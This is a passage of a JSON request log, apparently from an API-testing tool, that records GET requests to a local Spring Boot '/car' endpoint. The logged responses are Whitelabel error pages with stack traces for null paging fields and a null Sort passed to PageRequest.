java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":28.0,\"second\":36.0,\"nano\":5.684184E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":0.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":0.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":0.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:29:57 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 2\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 2 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;page\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.page,typeMismatch.page,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.page,page]; arguments []; default message [page]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;size\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.size,typeMismatch.size,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.size,size]; arguments []; default message [size]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":29.0,\"second\":57.0,\"nano\":8.709826E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":1.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":1.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?sort.orders.nullHandling\\u003dNATIVE\\u0026sort.orders\\u003d\\u0026sort.orders.direction\\u003dASC\\u0026size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort.orders.property\\u003d\\u0026sort.orders.ignoreCase\\u003dfalse\\u0026carId\\u003d\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:32:00 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dInternal Server Error, status\\u003d500).\\u003c/div\\u003e\\u003cdiv\\u003eFailed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.beans.BeanInstantiationException: Failed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:224)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:332)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\nCaused by: java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.util.Assert.notNull(Assert.java:201)\\r\\n\\tat org.springframework.data.domain.PageRequest.\\u0026lt;init\\u0026gt;(PageRequest.java:47)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\\r\\n\\tat java.lang.reflect.Constructor.newInstance(Constructor.java:423)\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:211)\\r\\n\\t... 51 more\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":32.0,\"second\":0.0,\"nano\":7.778263E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":0.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":0.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":0.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:32:05 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 2\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 2 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;page\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.page,typeMismatch.page,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.page,page]; arguments []; default message [page]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;size\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.size,typeMismatch.size,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.size,size]; arguments []; default message [size]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":32.0,\"second\":5.0,\"nano\":1.572907E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_